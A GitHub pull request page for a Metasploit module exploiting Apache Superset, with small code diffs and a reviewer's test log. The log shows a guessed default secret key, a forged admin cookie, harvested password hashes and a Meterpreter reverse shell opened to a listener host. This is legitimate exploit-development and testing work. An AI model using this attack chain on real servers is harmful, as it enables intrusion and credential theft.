Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Pr/collab/18351 #25

Merged
merged 3 commits into from
Oct 11, 2023
Merged

Pr/collab/18351 #25

merged 3 commits into from
Oct 11, 2023

Conversation

smcintyre-r7
Copy link

This makes the following changes:

  • Raises a more specific error message when failing because the internal database could not be mounted i.e. the DATABASE option is incorrect.
  • Uses a new Python deserialization module that will execute the Python payload inline. The gadget is only compatible with Python 3, but the oldest version of Superset on PyPi only supports Python 3.6.
  • Fixes an error when res is nil because the payload is running.
  • Moves the add_equals_to_base64 function to be private by just defining it inline.

@smcintyre-r7
Use an exec-in-place gadget for Python
59da286 
This adds a Python deserialization gadget that will exec arbitrary
Python code in place. It is only compatible with Python 3.x due to
differences in Python's exec function and statement between 2 and 3.
@smcintyre-r7
Make the add_equals_to_base64 function private
47b0c01
@smcintyre-r7
Raise a more specific error message
45be501 
Check for and raise a more specific error message when the internal
database fails to mount because the path is incorrect.
@smcintyre-r7 smcintyre-r7 mentioned this pull request Oct 10, 2023
Merged
8 tasks
h00die
h00die reviewed Oct 11, 2023
View reviewed changes
modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb
@@ -520,7 +502,7 @@ def rce_implant
'uri' => normalize_uri(target_uri.path, 'superset', 'dashboard', 'p', permalink_key, '/')
)
# we go through some permalink hell here
until res.headers['Location'].nil?
until res.nil? || res.headers['Location'].nil?
Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

good catch

modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb
@@ -273,6 +273,7 @@ def mount_internal_database
)

fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Failed to mount the internal database: #{datastore['DATABASE']}") if res.code == 422
Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I dont think I tested for this. Good to know it gives a super easy HTTP code to distinguish from!

@h00die
Copy link
Owner

h00die commented Oct 11, 2023

Worked for me.

msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Attempting login
[*] Grabbing CSRF token
[*] 127.0.0.1:8088 - CSRF Token: ImM5MTc2NmUxZjNiY2E0ZjJiOGIxNjY2NjNhYTM4YTdiMmU4NWU0MTki.ZSb3Og.aA5XRA2xxGs-YK80b5CWn_iA_Fo
[*] 127.0.0.1:8088 - Attempting login
[+] 127.0.0.1:8088 - Logged in Cookie: session=.eJwljztuAzEMRO-iegtJ_MqXMUiJRIIYMbBrV0HuHgGZ_r2Z-Sn3POP6KLfX-Y6j3D9XuZUVgUEGQTDXIvW6UKiBx-odaEpDx1GHtVA0ochliJUSuSZjJIMIMYUSLPEtSgcTsYqKmnMrmyohW90CZLVu0xli2pABrRxlXmfeX8-v-N575mjCHC3Bp2F2V2-8A2agJt53UWAbm3s8pz1iMxs8yvuK8_9SL79_ZflDNw.ZSb3Og.yKta6fSCX-Rdb_48hIBnerx222c;
[*] 127.0.0.1:8088 - Checking secret key: \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
[-] 127.0.0.1:8088 - Incorrect secret key: \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
[*] 127.0.0.1:8088 - Checking secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[+] 127.0.0.1:8088 - Found secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[*] 127.0.0.1:8088 - Modified cookie: {"_fresh"=>true, "_id"=>"dee4e5a3e53cdd58b0d47513bed2235c714b4909a1e84a75efda4405f460f64ef6377565e853d7ba3efb3a77a04848fcd58188546a0e84468a2acb63eca97931", "csrf_token"=>"c91766e1f3bca4f2b8b166663aa38a7b2e85e419", "locale"=>"en", "user_id"=>1}
[*] 127.0.0.1:8088 - Attempting to resign with key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[*] 127.0.0.1:8088 - New signed cookie: eyJfZnJlc2giOnRydWUsIl9pZCI6ImRlZTRlNWEzZTUzY2RkNThiMGQ0NzUxM2JlZDIyMzVjNzE0YjQ5MDlhMWU4NGE3NWVmZGE0NDA1ZjQ2MGY2NGVmNjM3NzU2NWU4NTNkN2JhM2VmYjNhNzdhMDQ4NDhmY2Q1ODE4ODU0NmEwZTg0NDY4YTJhY2I2M2VjYTk3OTMxIiwiY3NyZl90b2tlbiI6ImM5MTc2NmUxZjNiY2E0ZjJiOGIxNjY2NjNhYTM4YTdiMmU4NWU0MTkiLCJsb2NhbGUiOiJlbiIsInVzZXJfaWQiOjF9.ZSb3Og.nszZBIIlq-Dxl94sjrIx2hOGo68
[+] 127.0.0.1:8088 - Cookie validated to user: admin
[*] Attempting to pull user creds from db
[+] Successfully created db mapping with id: 2
[*] Creating new sqllab tab
[+] Using tab: 2
[*] Setting latest query id
[*] Harvesting superset user creds
[+] Superset Creds
==============

  Username  Password
  --------  --------
  admin     $pbkdf2-sha256$260000$R203aXBtQVh3ZUlFVmREdQ$/Sivpafs38x.LXzDbxhSsvjfZC5pKpuPONqzOWnsgrk
  user      $pbkdf2-sha256$260000$Sld1TTRIdmtEUjBDc0ViOQ$Oy7AMbeSVk4lBw7waOw08vRuzn12Px87GAzRfhEVUWA

[*] Attempting RCE
[*] Creating new dashboard
[+] New Dashboard id: 2
[*] Grabbing permalink to new dashboard to trigger payload later
[+] Dashboard permalink key: E0NwXmkv4kg
[*] Grabbing values to reset later
[*] Setting latest query id
[*] Setting latest query id
[*] Uploading payload
[*] Triggering payload
[*] Sending stage (24768 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.17.0.2:41254) at 2023-10-11 15:27:56 -0400
[*] Unsetting RCE Payloads
[*] Restoring row ID 1
[*] Setting latest query id
[+] Successfully restored
[*] Restoring row ID 3
[*] Setting latest query id
[+] Successfully restored
[*] Restoring row ID 4
[*] Setting latest query id
[+] Successfully restored
[*] Restoring row ID 5
[*] Setting latest query id
[+] Successfully restored
[*] Restoring row ID 6
[*] Setting latest query id
[+] Successfully restored
[*] Deleting dashboard
[*] Deleting sqllab tab
[*] Deleting database mapping

meterpreter > getuid
Server username: superset
meterpreter > sysinfo
Computer        : 2f7ff4a15c36
OS              : Linux 6.5.0-kali2-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.3-1kali2 (2023-10-03)
Architecture    : x64
System Language : C
Meterpreter     : python/linux

@h00die h00die merged commit 862a793 into h00die:superset_rce Oct 11, 2023
32 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@h00die h00die h00die left review comments

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@smcintyre-r7 @h00die